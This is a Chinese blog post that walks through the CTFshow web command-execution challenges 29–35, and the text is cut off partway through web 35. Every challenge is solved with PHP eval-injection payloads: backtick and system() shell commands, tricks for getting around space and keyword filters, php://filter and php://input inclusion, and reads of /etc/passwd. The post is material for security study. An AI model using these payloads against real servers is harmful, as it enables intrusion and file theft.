<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>CTFshow web 命令执行 | 惜缘怀古的博客</title><meta name="keywords" content="惜缘怀古，博客"><meta name="author" content="惜缘怀古"><meta name="copyright" content="惜缘怀古"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="web 29123456789101112131415 &lt;?php error_reporting(0);if(isset($_GET[&amp;#x27;c&amp;#x27;]))&amp;#123;    $c &#x3D; $_GET[&amp;#x27;c&amp;#x27;];    if(!preg_match(&quot;&#x2F;flag&#x2F;i&quot;, $c))&amp;#123;        eval($c);   &#x2F;&#x2F;eval(">
<meta property="og:type" content="article">
<meta property="og:title" content="CTFshow web 命令执行">
<meta property="og:url" content="https://xiyuanhuaigu.gitee.io/2022/07/08/CTFshow-web-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/index.html">
<meta property="og:site_name" content="惜缘怀古的博客">
<meta property="og:description" content="web 29123456789101112131415 &lt;?php error_reporting(0);if(isset($_GET[&amp;#x27;c&amp;#x27;]))&amp;#123;    $c &#x3D; $_GET[&amp;#x27;c&amp;#x27;];    if(!preg_match(&quot;&#x2F;flag&#x2F;i&quot;, $c))&amp;#123;        eval($c);   &#x2F;&#x2F;eval(">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/minglingzhixing.jpg">
<meta property="article:published_time" content="2022-07-08T09:02:29.000Z">
<meta property="article:modified_time" content="2022-08-03T16:18:26.880Z">
<meta property="article:author" content="惜缘怀古">
<meta property="article:tag" content="惜缘怀古，博客">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/minglingzhixing.jpg"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://xiyuanhuaigu.gitee.io/2022/07/08/CTFshow-web-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    jQuery: 'https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js',
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'CTFshow web 命令执行',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2022-08-04 00:18:26'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if (GLOBAL_CONFIG_SITE.isHome && /iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 5.4.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/2.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">66</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">0</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div></div><hr/></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/minglingzhixing.jpg')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">惜缘怀古的博客</a></span><div id="menus"><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">CTFshow web 命令执行</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-07-08T09:02:29.000Z" title="发表于 2022-07-08 17:02:29">2022-07-08</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-08-03T16:18:26.880Z" title="更新于 2022-08-04 00:18:26">2022-08-04</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">10.2k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>46分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="CTFshow web 命令执行"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="web-29"><a href="#web-29" class="headerlink" title="web 29"></a>web 29</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"> </span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);   <span class="comment">//eval() 函数把字符串按照 PHP 代码来计算。</span></span><br><span class="line">&#125;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码："><a href="#一-分析代码：" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><code>  if(!preg_match(&quot;/flag/i&quot;, $c))</code></p>
<p>preg_match 函数用于执行一个正则表达式。/i意味着不区分大小写。这句话的含义是不能使用flag而且忽略了大小写，这句话过滤了flag</p>
<h2 id="二-解题过程："><a href="#二-解题过程：" class="headerlink" title="二.解题过程："></a>二.解题过程：</h2><h3 id="方法一："><a href="#方法一：" class="headerlink" title="方法一："></a>方法一：</h3><p>传入</p>
<p><code> ?c=echo &quot;a&quot;?&gt;&lt;?php system(&quot;ls&quot;);</code></p>
<p>可以发现有flag.php,结合伪协议可以将flag.php的内容给读出来</p>
<p><code> ?c=echo &#39;a &#39;?&gt;&lt;?php include&quot;$_GET[url]&quot;;&amp;url=php://filter/read=convert.base64-encode/resource=flag.php</code></p>
<h3 id="方法二："><a href="#方法二：" class="headerlink" title="方法二："></a>方法二：</h3><p>1.首先查看一下php的版本，访问一下是7</p>
<p><code> ?c=phpinfo();</code></p>
<p>2.接下来查看一下发现没有禁用函数</p>
<p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-08174928.png"></p>
<p>disable_functions是php.ini中的一个设置选项，可以用来设置PHP环境禁止使用某些函数，通常是网站管理员为了安全起见，用来禁用某些危险的命令执行函数等。（eval并非PHP函数，放在disable_functions中是无法禁用的，若要禁用需要用到PHP的扩展Suhosin。）</p>
<p>3.列出当前目录的所有内容</p>
<p><code> ?c=print_r(scandir(&quot;./&quot;));</code></p>
<p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-08175421.png"></p>
<p>4.经过一系列的尝试发现可以采用写入文件的方法</p>
<p><code> ?c=system(“cat *php &gt;&gt;1.txt”);  *php是后缀为php，本句的意思是将后缀为php的写入2.txt中</code></p>
<p>5.之后访问/1.txt,即可得到flag</p>
<h3 id="方法三："><a href="#方法三：" class="headerlink" title="方法三："></a>方法三：</h3><p>涉及的知识点是<strong>通用符</strong><br>我们想要执行 cat flag.php，但是flag被过滤了,这时候就可以使用通配符<br>cat f*表示打开当前目录下所有 f开头的文件</p>
<p><code> ?c=echo system(&#39;cat f*&#39;);</code></p>
<h1 id="web-30"><a href="#web-30" class="headerlink" title="web 30"></a>web 30</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag|system|php/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码：-1"><a href="#一-分析代码：-1" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><code> if(!preg_match(&quot;/flag|system|php/i&quot;, $c))</code></p>
<p>过滤了flag，system,php</p>
<h2 id="二-解题过程：-1"><a href="#二-解题过程：-1" class="headerlink" title="二.解题过程："></a>二.解题过程：</h2><h3 id="方法一：-1"><a href="#方法一：-1" class="headerlink" title="方法一："></a>方法一：</h3><p><code>?c=include&quot;$_GET[url]&quot;?&gt;&amp;url=php://filter/read=convert.base64-encode/resource=flag.php</code></p>
<h3 id="方法二：-1"><a href="#方法二：-1" class="headerlink" title="方法二："></a>方法二：</h3><p>反引号执行系统命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=echo`cat * &gt;&gt; 1.txt`;</span><br></pre></td></tr></table></figure>

<p>访问1.txt，即可得到flag</p>
<h3 id="方法三：-1"><a href="#方法三：-1" class="headerlink" title="方法三："></a>方法三：</h3><p> 反引号执行系统命令<br> 使用通配符或*绕过过滤flag和php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=<span class="keyword">echo</span> `cat f*`;</span><br></pre></td></tr></table></figure>

<h1 id="web-31"><a href="#web-31" class="headerlink" title="web 31"></a>web 31</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag|system|php|cat|sort|shell|\.| |\&#x27;/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码：-2"><a href="#一-分析代码：-2" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(!preg_match(&quot;/flag|system|php|cat|sort|shell|\.| |\&#x27;/i&quot;, $c))</span><br></pre></td></tr></table></figure>

<p>过滤了flag,system,php,cat,sort,shell,空格,单引号，. 。</p>
<h2 id="二-解题思路："><a href="#二-解题思路：" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><h3 id="方法一：-2"><a href="#方法一：-2" class="headerlink" title="方法一："></a>方法一：</h3><p>1.涉及的知识点：</p>
<p><strong>空格过滤</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">%09 符号需要php环境</span><br><span class="line">&#123;cat,flag.txt&#125; </span><br><span class="line">cat$&#123;IFS&#125;flag.txt</span><br><span class="line">cat$IFS$9flag.txt</span><br><span class="line">cat&lt;flag.txt</span><br><span class="line">cat&lt;&gt;flag.txt</span><br><span class="line">kg=$&#x27;\x20flag.txt&#x27;&amp;&amp;cat$kg</span><br><span class="line">(\x20转换成字符串就是空格，这里通过变量的方式巧妙绕过)</span><br></pre></td></tr></table></figure>

<p><strong>cat过滤</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">more:一页一页的显示档案内容</span><br><span class="line">less:与 more 类似。但在用 more 时候可能不能向上翻页，不能向上搜索指定字符串，而 less 却可以自由的向上向下翻页，也可以自由的向上向下搜索指定字符串。</span><br><span class="line">head:查看头几行</span><br><span class="line">tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示</span><br><span class="line">tail:查看尾几行</span><br><span class="line">nl：命令的作用和 cat -n 类似，是将文件内容全部显示在屏幕上，并且是从第一行开始显示，同时会自动打印出行号。</span><br><span class="line">od:以二进制的方式读取档案内容</span><br><span class="line">vi:一种编辑器，这个也可以查看</span><br><span class="line">vim:一种编辑器，这个也可以查看</span><br><span class="line">sort:可以查看</span><br><span class="line">uniq:可以查看</span><br><span class="line">file -f:报错出具体内容。可以利用报错将文件内容带出来（-f&lt;名称文件&gt; 　指定名称文件，其内容有一个或多个文件名称时，让file依序辨识这些文件，格式为每列一个文件名称。）</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>2.我们可以构造playload:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">?c=<span class="keyword">echo</span>(`tac%<span class="number">09</span>f*`);</span><br><span class="line">?c=<span class="keyword">echo</span>(`tail%<span class="number">09</span>f*`);</span><br><span class="line">需要查看源码：</span><br><span class="line">?c=<span class="keyword">echo</span>(`nl%<span class="number">09</span>f*`);</span><br><span class="line">?c=<span class="keyword">echo</span>(`less%<span class="number">09</span>f*`);</span><br><span class="line">?c=<span class="keyword">echo</span>(`more%<span class="number">09</span>f*`);</span><br></pre></td></tr></table></figure>

<h3 id="方法二"><a href="#方法二" class="headerlink" title="方法二:"></a>方法二:</h3><p> 采用include结合<a target="_blank" rel="noopener" href="https://blog.csdn.net/nzjdsds/article/details/82461043">伪协议</a>进行包含读取</p>
<blockquote>
<p>?c=include”$_GET[url]”?&gt;&amp;url=php://filter/read=convert.base64-encode/resource=flag.php</p>
</blockquote>
<h1 id="web-32"><a href="#web-32" class="headerlink" title="web 32"></a>web 32</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"> </span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag|system|php|cat|sort|shell|\.| |\&#x27;|\`|echo|\;|\(/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码"><a href="#一-分析代码" class="headerlink" title="一.分析代码"></a>一.分析代码</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-09201640.png"></p>
<p>对以上进行了过滤</p>
<h2 id="二-解题思路：-1"><a href="#二-解题思路：-1" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>php中有很多不用括号的函数：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="number">123</span>;</span><br><span class="line"><span class="keyword">print</span> <span class="number">123</span>;</span><br><span class="line"><span class="keyword">die</span>;</span><br><span class="line"><span class="keyword">include</span> <span class="string">&quot;/etc/passwd&quot;</span>;</span><br><span class="line"><span class="keyword">require</span> <span class="string">&quot;/etc/passwd&quot;</span>;</span><br><span class="line"><span class="keyword">include_once</span> <span class="string">&quot;/etc/passwd&quot;</span>;</span><br><span class="line"><span class="keyword">require_once</span> <span class="string">&quot;etc/passwd&quot;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>尝试<code>include&quot;/etc/passwd&quot;?&gt;</code>可以执行，且代码没有过滤<code>$</code>，用c=include<code>&quot;$_POST[x]&quot;?&gt;</code>或者c=include<code>&quot;$_GET[x]&quot;?&gt;</code>然后用php伪协议将include包含的文件在页面上显示出来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=include&quot;$_GET[url]&quot;?&gt;&amp;url=php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure>

<h1 id="web-33"><a href="#web-33" class="headerlink" title="web 33"></a>web 33</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag|system|php|cat|sort|shell|\.| |\&#x27;|\`|echo|\;|\(|\&quot;/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码：-3"><a href="#一-分析代码：-3" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-09204247.png"></p>
<p>对以上进行了过滤</p>
<h2 id="二-解题思路：-2"><a href="#二-解题思路：-2" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><h3 id="方法一：-3"><a href="#方法一：-3" class="headerlink" title="方法一："></a>方法一：</h3><p>思路同上，但是本题过滤了单双引号</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=include$_GET[url]?&gt;&amp;url=php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure>

<h3 id="方法二：-2"><a href="#方法二：-2" class="headerlink" title="方法二："></a>方法二：</h3><p>使用input伪协议</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=include$_GET[url]?&gt;&amp;url=php://input </span><br></pre></td></tr></table></figure>

<p>post部分：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php system(&quot;more flag.php&quot;); ?&gt;</span><br></pre></td></tr></table></figure>

<h1 id="web-34"><a href="#web-34" class="headerlink" title="web 34"></a>web 34</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"> </span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag|system|php|cat|sort|shell|\.| |\&#x27;|\`|echo|\;|\(|\:|\&quot;/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码：-4"><a href="#一-分析代码：-4" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-09214440.png"></p>
<p>对以上进行过滤</p>
<h2 id="二-解题思路：-3"><a href="#二-解题思路：-3" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><h3 id="方法一：-4"><a href="#方法一：-4" class="headerlink" title="方法一："></a>方法一：</h3><p>思路同上，但是本题过滤了单双引号</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=include$_GET[url]?&gt;&amp;url=php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure>

<h3 id="方法二：-3"><a href="#方法二：-3" class="headerlink" title="方法二："></a>方法二：</h3><p>使用input伪协议</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=include$_GET[url]?&gt;&amp;url=php://input </span><br></pre></td></tr></table></figure>

<p>post部分：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php system(&quot;more flag.php&quot;); ?&gt;</span><br></pre></td></tr></table></figure>



<h1 id="web-35"><a href="#web-35" class="headerlink" title="web 35"></a>web 35</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag|system|php|cat|sort|shell|\.| |\&#x27;|\`|echo|\;|\(|\:|\&quot;|\&lt;|\=/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span 